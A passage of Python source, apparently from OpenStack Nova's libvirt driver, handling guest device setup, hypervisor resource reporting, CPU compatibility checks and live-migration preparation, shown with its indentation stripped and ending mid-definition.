clk.add_timer(tmpit)
clk.add_timer(tmrtc)
for cfg in self.get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
inst_type):
guest.add_device(cfg)
for (network, mapping) in network_info:
cfg = self.vif_driver.get_config(instance,
network, mapping,
image_meta,
inst_type)
guest.add_device(cfg)
if CONF.libvirt_type == "qemu" or CONF.libvirt_type == "kvm":
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
consolepty.type = "pty"
guest.add_device(consolepty)
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
if CONF.vnc_enabled and CONF.libvirt_type not in ('lxc', 'uml'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
if CONF.spice.enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
return guest
def to_xml(self, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
LOG.debug(_('Start to_xml instance=%(instance)s '
'network_info=%(network_info)s '
'disk_info=%(disk_info)s '
'image_meta=%(image_meta)s rescue=%(rescue)s'
'block_device_info=%(block_device_info)s'),
{'instance': instance, 'network_info': network_info,
'disk_info': disk_info, 'image_meta': image_meta,
'rescue': rescue, 'block_device_info': block_device_info})
conf = self.get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug(_('End to_xml instance=%(instance)s xml=%(xml)s'),
{'instance': instance, 'xml': xml})
return xml
def _lookup_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
(state, max_mem, mem, num_cpu, cpu_time) = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[state],
'max_mem': max_mem,
'mem': mem,
'num_cpu': num_cpu,
'cpu_time': cpu_time,
'id': virt_dom.ID()}
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0, power_on=True):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
inst_path = None
if instance:
inst_path = libvirt_utils.get_instance_path(instance)
if CONF.libvirt_type == 'lxc':
if not inst_path:
inst_path = None
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
if xml:
try:
domain = self._conn.defineXML(xml)
except Exception as e:
LOG.error(_("An error occurred while trying to define a domain"
" with xml: %s") % xml)
raise e
if power_on:
try:
domain.createWithFlags(launch_flags)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("An error occurred while trying to launch a "
"defined domain with xml: %s") %
domain.XMLDesc(0))
try:
self._enable_hairpin(domain.XMLDesc(0))
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("An error occurred while enabling hairpin mode on "
"domain with xml: %s") % domain.XMLDesc(0))
# NOTE(uni): Now the container is running with its own private mount
# namespace and so there is no need to keep the container rootfs
# mounted in the host namespace
if CONF.libvirt_type == 'lxc':
state = self.get_info(instance)['state']
container_dir = os.path.join(inst_path, 'rootfs')
if state == power_state.RUNNING:
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
return domain
def _create_domain_and_network(self, xml, instance, network_info,
block_device_info=None, power_on=True):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance, network_info)
domain = self._create_domain(xml, instance=instance, power_on=power_on)
self.firewall_driver.apply_instance_filter(instance, network_info)
return domain
def get_all_block_devices(self):
"""
Return all block devices in use on this node.
"""
devices = []
for dom_id in self.list_instance_ids():
try:
domain = self._lookup_by_id(dom_id)
doc = etree.fromstring(domain.XMLDesc(0))
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s") % dom_id)
continue
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def get_disks(self, instance_name):
"""
Note that this function takes an instance name.
Returns a list of all block devices for this domain.
"""
domain = self._lookup_by_name(instance_name)
xml = domain.XMLDesc(0)
try:
doc = etree.fromstring(xml)
except Exception:
return []
return filter(bool,
[target.get("dev")
for target in doc.findall('devices/disk/target')])
def get_interfaces(self, xml):
"""
Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def _get_cpuset_ids(self):
"""
Parsing vcpu_pin_set config.
Returns a list of pcpu ids can be used by instances.
"""
cpuset_ids = set()
cpuset_reject_ids = set()
for rule in CONF.vcpu_pin_set.split(','):
rule = rule.strip()
# Handle multi ','
if len(rule) < 1:
continue
# Note the count limit in the .split() call
range_parts = rule.split('-', 1)
if len(range_parts) > 1:
# So, this was a range; start by converting the parts to ints
try:
start, end = [int(p.strip()) for p in range_parts]
except ValueError:
raise exception.Invalid(_("Invalid range expression %r")
% rule)
# Make sure it's a valid range
if start > end:
raise exception.Invalid(_("Invalid range expression %r")
% rule)
# Add available pcpu ids to set
cpuset_ids |= set(range(start, end + 1))
elif rule[0] == '^':
# Not a range, the rule is an exclusion rule; convert to int
try:
cpuset_reject_ids.add(int(rule[1:].strip()))
except ValueError:
raise exception.Invalid(_("Invalid exclusion "
"expression %r") % rule)
else:
# OK, a single PCPU to include; convert to int
try:
cpuset_ids.add(int(rule))
except ValueError:
raise exception.Invalid(_("Invalid inclusion "
"expression %r") % rule)
# Use sets to handle the exclusion rules for us
cpuset_ids -= cpuset_reject_ids
if not cpuset_ids:
raise exception.Invalid(_("No CPUs available after parsing %r") %
CONF.vcpu_pin_set)
# This will convert the set to a sorted list for us
return sorted(cpuset_ids)
def get_vcpu_total(self):
"""Get available vcpu number of physical computer.
:returns: the number of cpu core instances can be used.
"""
if self._vcpu_total != 0:
return self._vcpu_total
try:
total_pcpus = self._conn.getInfo()[2]
except libvirt.libvirtError:
LOG.warn(_("Cannot get the number of cpu, because this "
"function is not implemented for this platform. "))
return 0
if CONF.vcpu_pin_set is None:
self._vcpu_total = total_pcpus
return self._vcpu_total
available_ids = self._get_cpuset_ids()
if available_ids[-1] >= total_pcpus:
raise exception.Invalid(_("Invalid vcpu_pin_set config, "
"out of hypervisor cpu range."))
self._vcpu_total = len(available_ids)
return self._vcpu_total
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt_images_type == 'lvm':
info = libvirt_utils.get_volume_group_info(
CONF.libvirt_images_volume_group)
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / (1024 ** 3)
return info
def get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu that currently used.
"""
total = 0
if CONF.libvirt_type == 'lxc':
return total + 1
dom_ids = self.list_instance_ids()
for dom_id in dom_ids:
try:
dom = self._lookup_by_id(dom_id)
vcpus = dom.vcpus()
if vcpus is None:
LOG.debug(_("couldn't obtain the vpu count from domain id:"
" %s") % dom_id)
else:
total += len(vcpus[1])
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s") % dom_id)
continue
# NOTE(gtt116): give change to do other task.
greenthread.sleep(0)
return total
def get_memory_mb_used(self):
"""Get the free memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
m = open('/proc/meminfo').read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt_type == 'xen':
used = 0
for domain_id in self.list_instance_ids():
try:
dom_mem = int(self._lookup_by_id(domain_id).info()[2])
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s")
% domain_id)
continue
# skip dom0
if domain_id != 0:
used += dom_mem
else:
# the mem reported by dom0 is be greater of what
# it is being used
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / 1024
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail / 1024
def get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
# Trying to do be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
return self._conn.getHostname()
def get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self.get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def get_cpu_info(self):
"""Get cpuinfo information.
Obtains cpu feature from virConnect.getCapabilities,
and returns as a json string.
:return: see above description
"""
caps = self.get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
# so we could just return the raw capabilties XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
# the libvirt drivers format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host.
"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
volume_id = bdm['volume_id']
LOG.debug(_("Trying to get stats for the volume %s"),
volume_id)
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
stats = dict(volume=volume_id,
instance=instance,
rd_req=vol_stats[0],
rd_bytes=vol_stats[1],
wr_req=vol_stats[2],
wr_bytes=vol_stats[3],
flush_operations=vol_stats[4])
LOG.debug(
_("Got volume usage stats for the volume=%(volume)s,"
" instance=%(instance)s, rd_req=%(rd_req)d,"
" rd_bytes=%(rd_bytes)d, wr_req=%(wr_req)d,"
" wr_bytes=%(wr_bytes)d")
% stats)
vol_usage.append(stats)
return vol_usage
def block_stats(self, instance_name, disk):
"""
Note that this function takes an instance name.
"""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_('Getting block stats failed, device might have '
'been detached. Instance=%(instance_name)s '
'Disk=%(disk)s Code=%(errcode)s Error=%(e)s'),
{'instance_name': instance_name, 'disk': disk,
'errcode': errcode, 'e': e})
except exception.InstanceNotFound:
LOG.info(_('Could not find domain in libvirt for instance %s. '
'Cannot get block stats for device'), instance_name)
def interface_stats(self, instance_name, interface):
"""
Note that this function takes an instance name.
"""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(interface)
def get_console_pool_info(self, console_type):
#TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource info.
This method is called as a periodic task and is used only
in live migration currently.
:param nodename: ignored in this driver
:returns: dictionary containing resource info
"""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = self.get_disk_over_committed_size_total()
# Disk available least size
available_least = disk_free_gb * (1024 ** 3) - disk_over_committed
return (available_least / (1024 ** 3))
disk_info_dict = self.get_local_gb_info()
dic = {'vcpus': self.get_vcpu_total(),
'memory_mb': self.get_memory_mb_total(),
'local_gb': disk_info_dict['total'],
'vcpus_used': self.get_vcpu_used(),
'memory_mb_used': self.get_memory_mb_used(),
'local_gb_used': disk_info_dict['used'],
'hypervisor_type': self.get_hypervisor_type(),
'hypervisor_version': self.get_hypervisor_version(),
'hypervisor_hostname': self.get_hypervisor_hostname(),
'cpu_info': self.get_cpu_info(),
'disk_available_least': _get_disk_available_least()}
return dic
def check_instance_shared_storage_local(self, context, instance):
dirpath = libvirt_utils.get_instance_path(instance)
if not os.path.exists(dirpath):
return None
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to verify with other "
"compute node that the instance is on "
"the same shared storage.") % tmp_file)
os.close(fd)
return {"filename": tmp_file}
def check_instance_shared_storage_remote(self, context, data):
return os.path.exists(data['filename'])
def check_instance_shared_storage_cleanup(self, context, data):
fileutils.delete_if_exists(data["filename"])
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing:
:filename: name of the tmpfile under CONF.instances_path
:block_migration: whether this is block migration
:disk_over_commit: disk-over-commit factor on dest host
:disk_available_mb: available disk space on dest host
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
disk_available_mb = \
(disk_available_gb * 1024) - CONF.reserved_host_disk_mb
# Compare CPU
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param context: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, context, instance,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
source = CONF.host
filename = dest_check_data["filename"]
block_migration = dest_check_data["block_migration"]
is_volume_backed = dest_check_data.get('is_volume_backed', False)
shared = self._check_shared_storage_test_file(filename)
if block_migration:
if shared:
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(context, instance,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not shared and not is_volume_backed:
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
dest_check_data.update({"is_shared_storage": shared})
# NOTE(mikal): include the instance directory name here because it
# doesn't yet exist on the destination but we want to force that
# same name to be used
instance_path = libvirt_utils.get_instance_path(instance,
relative=True)
dest_check_data['instance_relative_path'] = instance_path
return dest_check_data
def _assert_dest_node_has_enough_disk(self, context, instance,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
# Libvirt supports qcow2 disk format,which is usually compressed
# on compute nodes.
# Real disk image (compressed) may enlarged to "virtual disk size",
# that is specified as the maximum disk size.
# (See qemu-img -f path-to-disk)
# Scheduler recognizes destination host still has enough disk space
# if real disk size < available disk size
# if disk_over_commit is True,
# otherwise virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * (1024 ** 2)
ret = self.get_instance_disk_info(instance['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
reason = (_('Unable to migrate %(instance_uuid)s: '
'Disk of instance is too large(available'
' on destination host:%(available)s '
'< need:%(necessary)s)') %
{'instance_uuid': instance['uuid'],
'available': available,
'necessary': necessary})
raise exception.MigrationPreCheckError(reason=reason)
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openReadonly().getCapabilities().
return values follows by virCPUCompareResult.
if 0 > return value, do live migration.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string that shows cpu feature(see get_cpu_info())
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_('Instance launched has CPU info:\n%s') % cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
# unknown character exists in xml, then libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
ret = e.message
LOG.error(m, {'ret': ret, 'u': u})
if ret <= 0:
LOG.error(m, {'ret': ret, 'u': u})
raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.") % tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
Cannot confirm tmpfile return False.
"""
tmp_file = os.path.join(CONF.instances_path, filename)
if not os.path.exists(tmp_file):
return False
else:
return True
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance, network_info,
time_module=None):
"""Ensure that an instance's filtering rules are enabled.
When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
if not time_module:
time_module = greenthread
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance["name"])
time_module.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params block_migration: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params block_migration: if true, do block migration.
:params migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, context, instance, dest,
post_method, recover_method, block_migration,
migrate_data)
def _live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.block_migration_flag.split(',')
else:
flaglist = CONF.live_migration_flag.split(',')
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance["name"])
dom.migrateToURI(CONF.live_migration_uri % dest,
logical_sum,
None,
CONF.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Live Migration failure: %s"), e,
instance=instance)
recover_method(context, instance, dest, block_migration)
# Waiting for completion of live_migration.
timer = loopingcall.FixedIntervalLoopingCall(f=None)
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance)['state']
except exception.NotFound:
timer.stop()
post_method(context, instance, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def pre_live_migration(self, context, instance, block_device_info,
network_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_storage = True
is_volume_backed = False
is_block_migration = True
instance_relative_path = None
if migrate_data:
is_shared_storage = migrate_data.get('is_shared_storage', True)
is_volume_backed = migrate_data.get('is_volume_backed', False)
is_block_migration = migrate_data.get('block_migration', True)
instance_relative_path = migrate_data.get('instance_relative_path')
if not is_shared_storage:
# NOTE(mikal): this doesn't use libvirt_utils.get_instance_path
# because we are ensuring that the same instance directory name
# is used as was at the source
if instance_relative_path:
instance_dir = os.path.join(CONF.instances_path,
instance_relative_path)
else:
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
if is_volume_backed and not (is_block_migration or is_shared_storage):
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance)
libvirt_utils.file_open(console_file, 'a').close()
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
# Retry operation is necessary because continuously request comes,
# concorrent request occurs to iptables, then it complains.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance, network_info)
break
except processutils.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
LOG.warn(_('plug_vifs() failed %(cnt)d. Retry up to '
'%(max_retry)d.'),
{'cnt': cnt,
'max_retry': max_retry},
instance=instance)
greenthread.sleep(1)
def pre_block_migration(self, context, instance, disk_info_json):
"""Preparation for block migration."""
# NOTE (rmk): When preparing for a block migration, the instance dir
# should not exist on the destination hypervisor.
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
self._create_images_and_backing(context, instance, disk_info_json)
def _create_images_and_backing(self, context, instance, disk_info_json):
"""
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params disk_info_json:
json strings specified in get_instance_disk_info
"""
disk_info = jsonutils.loads(disk_info_json)
instance_dir = libvirt_utils.get_instance_path(instance)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['disk_size'])
else:
# Creating backing file follows same way as spawning instances.
cache_name = os.path.basename(info['backing_file'])
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt_images_type)
image.cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
def post_live_migration_at_destination(self, context,
instance,
network_info,
block_migration,
block_device_info=None):
